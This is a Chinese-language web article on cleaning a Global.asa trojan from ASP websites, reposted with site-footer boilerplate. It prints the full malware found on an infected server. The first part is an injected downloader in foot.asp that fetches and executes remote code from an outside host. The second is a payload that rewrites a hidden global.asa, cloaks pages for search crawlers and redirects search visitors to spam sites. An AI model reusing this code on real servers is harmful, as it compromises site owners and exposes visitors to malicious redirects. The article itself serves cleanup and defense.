网站中Global.asa木马的快速清除方法
也想出现在这里?
联系我们吧
解决办法: 1、用青云团队开发的网站木马清理专家全面扫描服务器上的网站,网站木马清理专家下载地址:https://www.jb51.net/softs/12771.html2、如果这时木马还是存在,用我们的网站木马清理专家的快速查马功能快速查杀by*aming或aming特征码,如下图所示: 3、关闭服务器上的缩略图功能 方法参考 https://www.jb51.net/os/windows/Win2003/34960.html根源: 这次用户中的是下载者类的木马,黑客通过网站上传漏洞上在网站根目录的foot.asp下插入了以下代码:
复制代码
代码如下:
<% \’by*aming Function Gethtml(url) Set ObjXMLHTTP=Server.CreateObject(\”MSXML2.serverXMLHTTP\”) ObjXMLHTTP.Open \”GET\”,url,False ObjXMLHTTP.setRequestHeader \”User-Agent\”,url ObjXMLHTTP.send Gethtml=ObjXMLHTTP.responseBody Set ObjXMLHTTP=Nothing set objStream = Server.CreateObject(\”Adodb.Stream\”) objStream.Type = 1 objStream.Mode =3 objStream.Open objStream.Write Gethtml objStream.Position = 0 objStream.Type = 2 objStream.Charset = \”gb2312\” Gethtml = objStream.ReadText objStream.Close set objStream=Nothing End Function execute(Gethtml(\”http://www.pornhome.com/dy7749/xmlasaquan.txt\”)) %>
清掉这段代码即可解决问题,网站木马清理专家查杀结果如下图所示! xmlasaquan.txt的内容如下:
复制代码
代码如下:
\'<html><head><script>function clear(){Source=document.body.firstChild.data;document.open();document.close();document.title=\”\”;document.body.innerHTML=Source;}</script></head><body onload=clear()> \'<meta http-equiv=refresh content=0;URL=about:blank><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!\’\’.replace(/^/,String)){while(c–){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return\’\\\\w+\’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(\’\\\\b\’+e(c)+\’\\\\b\’,\’g\’),k[c])}}return p}(\’0.1.2(\\\’3:4\\\’);\’,5,5,\’window|location|replace|about|blank\’.split(\’|\’),0,{}))</script> \’by*aming Server.ScriptTimeout=600 Public Function createasa(ByVal Content) On Error Resume Next Set fso = Server.CreateObject(\”scripting.filesystemobject\”) set f=fso.Getfile(\”//./\” & Server.MapPath(\”/global.asa\”)) f.Attributes=0 Set Obj = Server.CreateObject(\”adod\” & \”b.S\” & \”tream\”) Obj.Type = 2 Obj.open Obj.Charset = \”gb2312\” Obj.Position = Obj.Size Obj.writetext = Content Obj.SaveToFile \”//./\” & Server.MapPath(\”/global.asa\”),2 Obj.Close Set Obj = Nothing f.Attributes=1+2+4 set f=Nothing Set fso = Nothing End Function Public Function GetHtml(url) Set ObjXMLHTTP=Server.CreateObject(\”MSXML2.serverXMLHTTP\”) ObjXMLHTTP.Open \”GET\”,url,False ObjXMLHTTP.setRequestHeader \”User-Agent\”,url ObjXMLHTTP.send GetHtml=ObjXMLHTTP.responseBody Set ObjXMLHTTP=Nothing set objStream = Server.CreateObject(\”Adodb.Stream\”) objStream.Type = 1 objStream.Mode =3 objStream.Open objStream.Write GetHtml objStream.Position = 0 objStream.Type = 2 objStream.Charset = \”gb2312\” GetHtml = objStream.ReadText objStream.Close End Function Function check(user_agent) allow_agent=split(\”Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp\”,\”,\”) check_agent=false For agenti=lbound(allow_agent) to ubound(allow_agent) If instr(user_agent,allow_agent(agenti))>0 then check_agent=true exit for end if Next check=check_agent End function Function CheckRobot() CheckRobot = False Dim Botlist,i,Repls Repls = request.ServerVariables(\”http_user_agent\”) Krobotlist = \”Baiduspider|Googlebot\” Botlist = Split(Krobotlist,\”|\”) For i = 0 To Ubound(Botlist) If InStr(Repls,Botlist(i)) > 0 Then CheckRobot = True Exit For End If Next If Request.QueryString(\”admin\”)= \”1\” Then Session(\”ThisCheckRobot\”)=1 If Session(\”ThisCheckRobot\”) = 1 Then CheckRobot = True End Function Function CheckRefresh() CheckRefresh = False Dim Botlist,i,Repls Krobotlist = \”baidu|google|sogou|soso|youdao\” Botlist = Split(Krobotlist,\”|\”) For i = 0 To Ubound(Botlist) If InStr(left(request.servervariables(\”HTTP_REFERER\”),\”40\”),Botlist(i)) > 0 Then CheckRefresh = True Exit For End If Next End Function Sub sleep() If response.IsClientConnected=true then Response.Flush else response.end end if End Sub If CheckRefresh=true Then cnnbd=lcase(request.servervariables(\”HTTP_HOST\”)) response.redirect(\”http://www.82767.com/?\”&cnnbd&\”\”) \’Response.Write(\”<a href=http://www.82767.com><font _fcksavedurl=\”http://www.82767.com><font\” color=#FF0000>如果您的浏览器不支持跳转,请点击进入>>>>>></font></a><div style=display:none><script src=http://count11.51yes.com/click.aspx?id=114814173&logo=12></script></div><script _fcksavedurl=\”http://count11.51yes.com/click.aspx?id=114814173&logo=12></script></div><script\” src=http://js.568tea.com/44.js></script><script src=http://js.37548.com/44.js></script>\”) response.end end If user_agent=Request.ServerVariables(\”HTTP_USER_AGENT\”) if check(user_agent)=true then body=GetHtml(\”http://fudu.qpedu.cn/xml/prn/con.2.asp?domain=\”&strHost&\”&ua=\”&server.URLEncode(request.ServerVariables(\”HTTP_USER_AGENT\”))&\”\”) response.write body response.end else asa=GetHtml(\”http://www.pornhome.com/dy7749/codequan.txt\”) if instr(asa,\”by*aming\”)>0 then createasa(asa) end if ScriptAddress=Request.ServerVariables(\”SCRIPT_NAME\”) namepath=Server.MapPath(ScriptAddress) If Len(Request.QueryString) > 0 Then ScriptAddress = ScriptAddress & \”?\” & Request.QueryString end if geturl =\”http://\”& Request.ServerVariables(\”http_host\”) & ScriptAddress geturl =LCase(geturl) \’response.write replace(namepath,server.MapPath(\”/\”),\”\”) \’response.end \’if instr(geturl,\”jc=ok\”)=0 and instr(geturl,\”global=ok\”)=0 and instr(LCase(Request.ServerVariables(\”http_host\”)),\”gov.cn\”)=0 and instr(LCase(Request.ServerVariables(\”http_host\”)),\”edu.cn\”)=0 and if instr(geturl,\”http://\”& Request.ServerVariables(\”http_host\”) &\”/index.asp\”)=0 and instr(geturl,\”http://\”& Request.ServerVariables(\”http_host\”) &\”/\”)=0 and instr(LCase(Request.ServerVariables(\”HTTP_REFERER\”)),LCase(Request.ServerVariables(\”http_host\”)))<=0 then agent = lcase(request.servervariables(\”http_user_agent\”)) referer = LCase(Request.ServerVariables(\”HTTP_REFERER\”)) bot = \”\” Amll = \”\” if instr(agent, \”+\”) > 0 then bot = agent if instr(agent, \”-\”) > 0 then bot = agent if instr(agent, \”http\”) > 0 then bot = agent if instr(agent, \”spider\”) > 0 then bot = agent if instr(agent, \”bot\”) > 0 then bot = agent if instr(agent, \”linux\”) > 0 then bot = agent if instr(agent, \”baidu\”) > 0 then bot = agent if instr(agent, \”google\”) > 0 then bot = \”nobot\” if instr(agent, \”yahoo\”) > 0 then bot = \”nobot\” if instr(agent, \”msn\”) > 0 then bot = \”nobot\” if instr(agent, \”alexa\”) > 0 then bot = \”nobot\” if instr(agent, \”sogou\”) > 0 then bot = \”nobot\” if instr(agent, \”youdao\”) > 0 then bot = \”nobot\” if instr(agent, \”soso\”) > 0 then bot = \”nobot\” if instr(agent, \”iask\”) > 0 then bot = \”nobot\” if bot=\”nobot\” then \’Call WriteErr \’response.end end if Call sleep() end if end if \'</body></html>
1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 网站中Global.asa木马的快速清除方法
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 网站中Global.asa木马的快速清除方法
常见问题FAQ
- 免费下载或者VIP会员专享资源能否直接商用?
- 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
- 织梦模板使用说明
- 你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html